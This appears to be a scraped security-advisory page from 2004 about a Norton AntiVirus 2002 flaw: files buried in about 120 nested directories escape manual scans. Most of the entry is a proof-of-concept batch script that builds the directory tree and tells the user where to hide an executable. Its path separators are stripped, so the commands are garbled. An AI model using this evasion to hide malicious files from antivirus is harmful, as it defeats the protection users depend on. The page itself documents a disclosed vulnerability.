exploits , vulnerabilities , articles , Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass Vulnerability

Title	Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass Vulnerability
Published	2004-04-17-12:00AM
Updated	2004-04-19-02:56PM
Class	Failure to Handle Exceptional Conditions
CVE	CVE-MAP-NOMATCH
Remote	No
Local	Yes
Credit	Discovery is credited to Bipin Gautam <visitbipin@hotmail.com>.
Vulnerable	Symantec Norton AntiVirus 2002 Microsoft Windows 2000 Professional Microsoft Windows 2000 Professional SP1 Microsoft Windows 2000 Professional SP2 Microsoft Windows 98 Microsoft Windows ME Microsoft Windows NT Workstation 4.0 Microsoft Windows NT Workstation 4.0 SP1 Microsoft Windows NT Workstation 4.0 SP2 Microsoft Windows NT Workstation 4.0 SP3 Microsoft Windows NT Workstation 4.0 SP4 Microsoft Windows NT Workstation 4.0 SP5 Microsoft Windows NT Workstation 4.0 SP6 Microsoft Windows NT Workstation 4.0 SP6a Microsoft Windows XP Home Microsoft Windows XP Professional
Not Vulnerable
Code	The following proof-of-concept was provided: @echo off rem Bipin Gautam [hUNT3R] rem [http://www.geocities.com/visitbipin] * [http://www.01security.com] echo ? echo ************************************************ echo -( For a harmless test... you can use, echo http://www.eicar.org/anti_virus_test_file.htm )- echo ************************************************ pause cdc: cd:hUNT3r md 1 cd 1 if not errorlevel 1 goto :hUNT3r cd.. rmdir 1 md X cls echo *************************************************************** echo Now you can inject any file inside the folder 'X' which is inside echo 120'th sub-directory of 'c:1' [ i.e c:1..........[120'th dir].....X ] echo Note: The file you are moving to'c:1...X' should only contain echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc... echo not as '123.not' 'qwert.hak' echo ......... echo So, ARE YOU DONE!? echo ......... echo After this batch script is terminated, you'll echo find the file you ^just copied^ inside c:1........Xecho now in c:33333111......[130' th dir].....Xecho mmm... Then have a manual scan of c:3 Any file you echo have put inside the dir. 'X' can't be detected by NORTON Antivirus anymore!!! echo *************************************************** pause cdmd 3333333333cdxcopy /E /I c:1*.* c:3333333333exit
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 Drupal Sections Module HTML Injection Vulnerability
• 2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
• 2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
• 2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
• 2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
• 2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
• 2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 12:00:20 +0000